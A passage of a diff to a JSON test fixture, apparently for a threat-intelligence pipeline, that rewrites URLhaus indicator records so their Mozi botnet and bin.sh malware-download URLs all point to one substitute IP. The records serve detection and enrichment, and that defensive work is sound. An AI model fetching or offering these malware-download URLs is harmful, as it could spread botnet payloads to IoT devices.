- "ingested": "2021-12-13T06:08:08.693828043Z",
- "original": "{\"id\":\"961190\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961190/\",\"url\":\"http://42.230.84.239:45797/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.84.239\",\"date_added\":\"2021-01-14 18:21:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027085Z",
+ "original": "{\"id\":\"961190\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961190/\",\"url\":\"http://89.160.20.156:45797/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17337,18 +17337,18 @@
 "url": {
 "path": "/bin.sh",
 "extension": "sh",
- "original": "http://61.53.222.100:43741/bin.sh",
+ "original": "http://89.160.20.156:43741/bin.sh",
 "scheme": "http",
 "port": 43741,
- "domain": "61.53.222.100",
- "full": "http://61.53.222.100:43741/bin.sh"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:43741/bin.sh"
 },
- "ip": "61.53.222.100"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693831289Z",
- "original": "{\"id\":\"961186\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961186/\",\"url\":\"http://61.53.222.100:43741/bin.sh\",\"url_status\":\"online\",\"host\":\"61.53.222.100\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
+ "ingested": "2021-12-13T08:40:08.027092Z",
+ "original": "{\"id\":\"961186\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961186/\",\"url\":\"http://89.160.20.156:43741/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17386,18 +17386,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://59.93.21.58:35446/Mozi.a",
+ "original": "http://89.160.20.156:35446/Mozi.a",
 "scheme": "http",
 "port": 35446,
- "domain": "59.93.21.58",
- "full": "http://59.93.21.58:35446/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:35446/Mozi.a"
 },
- "ip": "59.93.21.58"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693834485Z",
- "original": "{\"id\":\"961187\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961187/\",\"url\":\"http://59.93.21.58:35446/Mozi.a\",\"url_status\":\"offline\",\"host\":\"59.93.21.58\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027099Z",
+ "original": "{\"id\":\"961187\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961187/\",\"url\":\"http://89.160.20.156:35446/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17435,18 +17435,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.88.231.198:35720/Mozi.m",
+ "original": "http://89.160.20.156:35720/Mozi.m",
 "scheme": "http",
 "port": 35720,
- "domain": "59.88.231.198",
- "full": "http://59.88.231.198:35720/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:35720/Mozi.m"
 },
- "ip": "59.88.231.198"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693837631Z",
- "original": "{\"id\":\"961188\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961188/\",\"url\":\"http://59.88.231.198:35720/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.88.231.198\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027105800Z",
+ "original": "{\"id\":\"961188\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961188/\",\"url\":\"http://89.160.20.156:35720/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17484,18 +17484,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.96.37.115:50501/Mozi.m",
+ "original": "http://89.160.20.156:50501/Mozi.m",
 "scheme": "http",
 "port": 50501,
- "domain": "59.96.37.115",
- "full": "http://59.96.37.115:50501/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50501/Mozi.m"
 },
- "ip": "59.96.37.115"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693840857Z",
- "original": "{\"id\":\"961189\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961189/\",\"url\":\"http://59.96.37.115:50501/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.37.115\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027112700Z",
+ "original": "{\"id\":\"961189\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961189/\",\"url\":\"http://89.160.20.156:50501/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17533,18 +17533,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://119.118.75.183:55796/Mozi.m",
+ "original": "http://89.160.20.156:55796/Mozi.m",
 "scheme": "http",
 "port": 55796,
- "domain": "119.118.75.183",
- "full": "http://119.118.75.183:55796/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:55796/Mozi.m"
 },
- "ip": "119.118.75.183"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693843903Z",
- "original": "{\"id\":\"961185\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961185/\",\"url\":\"http://119.118.75.183:55796/Mozi.m\",\"url_status\":\"online\",\"host\":\"119.118.75.183\",\"date_added\":\"2021-01-14 18:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027119500Z",
+ "original": "{\"id\":\"961185\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961185/\",\"url\":\"http://89.160.20.156:55796/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17582,18 +17582,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://175.206.182.103:52308/Mozi.m",
+ "original": "http://89.160.20.156:52308/Mozi.m",
 "scheme": "http",
 "port": 52308,
- "domain": "175.206.182.103",
- "full": "http://175.206.182.103:52308/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:52308/Mozi.m"
 },
- "ip": "175.206.182.103"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693846989Z",
- "original": "{\"id\":\"961183\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961183/\",\"url\":\"http://175.206.182.103:52308/Mozi.m\",\"url_status\":\"online\",\"host\":\"175.206.182.103\",\"date_added\":\"2021-01-14 18:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027126500Z",
+ "original": "{\"id\":\"961183\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961183/\",\"url\":\"http://89.160.20.156:52308/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17631,18 +17631,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://117.222.162.104:59154/Mozi.m",
+ "original": "http://89.160.20.156:59154/Mozi.m",
 "scheme": "http",
 "port": 59154,
- "domain": "117.222.162.104",
- "full": "http://117.222.162.104:59154/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:59154/Mozi.m"
 },
- "ip": "117.222.162.104"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693850125Z",
- "original": "{\"id\":\"961184\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961184/\",\"url\":\"http://117.222.162.104:59154/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.162.104\",\"date_added\":\"2021-01-14 18:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027133400Z",
+ "original": "{\"id\":\"961184\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961184/\",\"url\":\"http://89.160.20.156:59154/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17680,18 +17680,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://122.188.192.87:57950/Mozi.m",
+ "original": "http://89.160.20.156:57950/Mozi.m",
 "scheme": "http",
 "port": 57950,
- "domain": "122.188.192.87",
- "full": "http://122.188.192.87:57950/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:57950/Mozi.m"
 },
- "ip": "122.188.192.87"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693853441Z",
- "original": "{\"id\":\"961177\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961177/\",\"url\":\"http://122.188.192.87:57950/Mozi.m\",\"url_status\":\"online\",\"host\":\"122.188.192.87\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027140400Z",
+ "original": "{\"id\":\"961177\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961177/\",\"url\":\"http://89.160.20.156:57950/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17729,18 +17729,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://222.141.8.40:33520/Mozi.m",
+ "original": "http://89.160.20.156:33520/Mozi.m",
 "scheme": "http",
 "port": 33520,
- "domain": "222.141.8.40",
- "full": "http://222.141.8.40:33520/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:33520/Mozi.m"
 },
- "ip": "222.141.8.40"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693857308Z",
- "original": "{\"id\":\"961178\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961178/\",\"url\":\"http://222.141.8.40:33520/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.141.8.40\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027147900Z",
+ "original": "{\"id\":\"961178\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961178/\",\"url\":\"http://89.160.20.156:33520/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17778,18 +17778,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://123.14.202.127:45525/Mozi.m",
+ "original": "http://89.160.20.156:45525/Mozi.m",
 "scheme": "http",
 "port": 45525,
- "domain": "123.14.202.127",
- "full": "http://123.14.202.127:45525/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:45525/Mozi.m"
 },
- "ip": "123.14.202.127"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693860795Z",
- "original": "{\"id\":\"961179\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961179/\",\"url\":\"http://123.14.202.127:45525/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.202.127\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027155100Z",
+ "original": "{\"id\":\"961179\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961179/\",\"url\":\"http://89.160.20.156:45525/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17827,18 +17827,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://41.86.21.38:38430/Mozi.m",
+ "original": "http://89.160.20.156:38430/Mozi.m",
 "scheme": "http",
 "port": 38430,
- "domain": "41.86.21.38",
- "full": "http://41.86.21.38:38430/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:38430/Mozi.m"
 },
- "ip": "41.86.21.38"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693863941Z",
- "original": "{\"id\":\"961180\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961180/\",\"url\":\"http://41.86.21.38:38430/Mozi.m\",\"url_status\":\"online\",\"host\":\"41.86.21.38\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027162Z",
+ "original": "{\"id\":\"961180\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961180/\",\"url\":\"http://89.160.20.156:38430/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17876,18 +17876,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://220.125.119.207:4096/Mozi.m",
+ "original": "http://89.160.20.156:4096/Mozi.m",
 "scheme": "http",
 "port": 4096,
- "domain": "220.125.119.207",
- "full": "http://220.125.119.207:4096/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:4096/Mozi.m"
 },
- "ip": "220.125.119.207"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693867097Z",
- "original": "{\"id\":\"961181\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961181/\",\"url\":\"http://220.125.119.207:4096/Mozi.m\",\"url_status\":\"online\",\"host\":\"220.125.119.207\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027168900Z",
+ "original": "{\"id\":\"961181\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961181/\",\"url\":\"http://89.160.20.156:4096/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17925,18 +17925,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://121.150.209.136:50631/Mozi.a",
+ "original": "http://89.160.20.156:50631/Mozi.a",
 "scheme": "http",
 "port": 50631,
- "domain": "121.150.209.136",
- "full": "http://121.150.209.136:50631/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50631/Mozi.a"
 },
- "ip": "121.150.209.136"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693870583Z",
- "original": "{\"id\":\"961182\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961182/\",\"url\":\"http://121.150.209.136:50631/Mozi.a\",\"url_status\":\"online\",\"host\":\"121.150.209.136\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027175900Z",
+ "original": "{\"id\":\"961182\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961182/\",\"url\":\"http://89.160.20.156:50631/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17974,18 +17974,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://186.33.122.85:37989/Mozi.m",
+ "original": "http://89.160.20.156:37989/Mozi.m",
 "scheme": "http",
 "port": 37989,
- "domain": "186.33.122.85",
- "full": "http://186.33.122.85:37989/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:37989/Mozi.m"
 },
- "ip": "186.33.122.85"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693873879Z",
- "original": "{\"id\":\"961176\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961176/\",\"url\":\"http://186.33.122.85:37989/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.122.85\",\"date_added\":\"2021-01-14 18:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027182900Z",
+ "original": "{\"id\":\"961176\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961176/\",\"url\":\"http://89.160.20.156:37989/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18023,18 +18023,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://219.157.253.54:54078/Mozi.m",
+ "original": "http://89.160.20.156:54078/Mozi.m",
 "scheme": "http",
 "port": 54078,
- "domain": "219.157.253.54",
- "full": "http://219.157.253.54:54078/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:54078/Mozi.m"
 },
- "ip": "219.157.253.54"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693877236Z",
- "original": "{\"id\":\"961175\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961175/\",\"url\":\"http://219.157.253.54:54078/Mozi.m\",\"url_status\":\"online\",\"host\":\"219.157.253.54\",\"date_added\":\"2021-01-14 18:20:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027189900Z",
+ "original": "{\"id\":\"961175\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961175/\",\"url\":\"http://89.160.20.156:54078/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18072,18 +18072,18 @@
 "provider": "geenensp",
 "url": {
 "path": "/i",
- "original": "http://219.154.108.170:34201/i",
+ "original": "http://89.160.20.156:34201/i",
 "scheme": "http",
 "port": 34201,
- "domain": "219.154.108.170",
- "full": "http://219.154.108.170:34201/i"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:34201/i"
 },
- "ip": "219.154.108.170"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693880502Z",
- "original": "{\"id\":\"961173\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961173/\",\"url\":\"http://219.154.108.170:34201/i\",\"url_status\":\"online\",\"host\":\"219.154.108.170\",\"date_added\":\"2021-01-14 18:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
+ "ingested": "2021-12-13T08:40:08.027196800Z",
+ "original": "{\"id\":\"961173\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961173/\",\"url\":\"http://89.160.20.156:34201/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18121,18 +18121,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.59.119.91:56573/Mozi.m",
+ "original": "http://89.160.20.156:56573/Mozi.m",
 "scheme": "http",
 "port": 56573,
- "domain": "115.59.119.91",
- "full": "http://115.59.119.91:56573/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:56573/Mozi.m"
 },
- "ip": "115.59.119.91"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693883748Z",
- "original": "{\"id\":\"961174\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961174/\",\"url\":\"http://115.59.119.91:56573/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.59.119.91\",\"date_added\":\"2021-01-14 18:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027203700Z",
+ "original": "{\"id\":\"961174\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961174/\",\"url\":\"http://89.160.20.156:56573/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18171,18 +18171,18 @@
 "url": {
 "path": "/bin.sh",
 "extension": "sh",
- "original": "http://125.44.61.35:48291/bin.sh",
+ "original": "http://89.160.20.156:48291/bin.sh",
 "scheme": "http",
 "port": 48291,
- "domain": "125.44.61.35",
- "full": "http://125.44.61.35:48291/bin.sh"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:48291/bin.sh"
 },
- "ip": "125.44.61.35"
+ "ip": "89.160.20.156"
